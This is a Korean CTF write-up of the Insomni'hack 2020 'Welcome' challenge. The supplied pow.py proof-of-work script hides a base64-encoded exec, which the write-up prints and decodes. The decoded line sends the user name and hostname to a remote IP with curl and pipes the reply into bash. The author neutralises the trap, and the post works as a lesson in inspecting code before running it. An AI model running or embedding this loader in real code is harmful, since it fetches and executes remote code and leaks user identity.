• Writeup/CTF_Writeup

    [Insomni'hack teaser] Welcome

    2020. 1. 21.

    by. ugonfor

    문제:

    This year we added a Proof of Work to some of our challenges.

    Just run python pow.py <target>, were target is the value provided by the server and get the flag.

    nc welcome.insomnihack.ch 1337

    nc welcome.insomnihack.ch 1337 를 하면 다음과 같은 shell이 나온다.

    ryuhyogon@ubuntu:~/Desktop$ nc welcome.insomnihack.ch 1337

    ======================================================================
============   Welcome to the Insomni'Hack Teaser 2020!   ============
======================================================================

Give me an input whose md5sum starts with "1461ce" and get the flag ;)

    문제에서는 python [pow.py](http://pow.py) <target> 이라 하였으니, python [pow.py](http://pow.py) 1464ce 를 해봤다.

    ryuhyogon@ubuntu:~/Desktop$ ./pow-b39e9d8f81a48ac92097ce060d587ace718c2db8bc9b3906ac640b90a62dc497.py 1461ce
sh: 1: curl: not found
1433358

    1433358이 나와서 입력해보았더니

    ======================================================================
============   Welcome to the Insomni'Hack Teaser 2020!   ============
======================================================================

Give me an input whose md5sum starts with "1461ce" and get the flag ;)
1433358

                   «Welcome to the wall of shame 2.0!» ~Mallory

    다음처럼 나옴.

    그래서 pow.py 파일을 열어보았다.

    #!/usr/bin/python3

import base64
import hashlib
import os
import sys

target = sys.argv[1]
i = 0

def pow():
    global i, target
    while True:
        m = hashlib.md5()
        m.update(str(i).encode())
        h = m.hexdigest()
        if h[:6] == target:
            exec(base64.b64decode('Z2xvYmFsIGk7aSs9MTMzNzt4PW9zLm5hbWU7eCs9Ii8kKHdob2FtaSlAJChob3N0bmFtZSl8YmFzaCJpZiB4IT0ibnQiZWxzZSIvJVVTRVJOQU1FJUAlVVNFUkRPTUFJTiUiO29zLnN5c3RlbSgiY3VybCAtTnMgMzQuNjUuMTg3LjE0MS8iK3gp'))
            print(i)
            exit(0)
        i += 1

if __name__ == '__main__':
    pow()

    base64.b64decode의 값을 확인해 보니,

    global i;i+=1337;[x=os.name](http://x%3Dos.name/);x+="/$(whoami)@$(hostname)|bash"if x!="nt"else"/%USERNAME%@%USERDOMAIN%";os.system("curl -Ns 34.65.187.141/"+x)

    이었다.

    다음값을 주석처리하고 다시 시도해보니,

    ======================================================================
============   Welcome to the Insomni'Hack Teaser 2020!   ============
======================================================================

Give me an input whose md5sum starts with "574558" and get the flag ;)
5383078     

    MITM are real: check SHA, check code, ...

INS{Miss me with that fhisy line}

    Flag: INS{Miss me with that fhisy line}

    저작자표시 비영리 동일조건

    'Writeup > CTF_Writeup' 카테고리의 다른 글

    [ Defenit CTF 2020 ] Lord fool song remix  (0) 2020.06.08
    [ Defenit CTF 2020 ] momsTouch  (0) 2020.06.08
    [ RCTF 2020 ] rust-flag  (0) 2020.06.02
    [ CODEGATE 2020 Preliminary ] RS(702pt) wripte-up  (3) 2020.02.09
    [Insomni'hack teaser] Kaboom writeup  (0) 2020.01.21

    댓글

    관련글

    맨 위로
전체 글 보기

티스토리툴바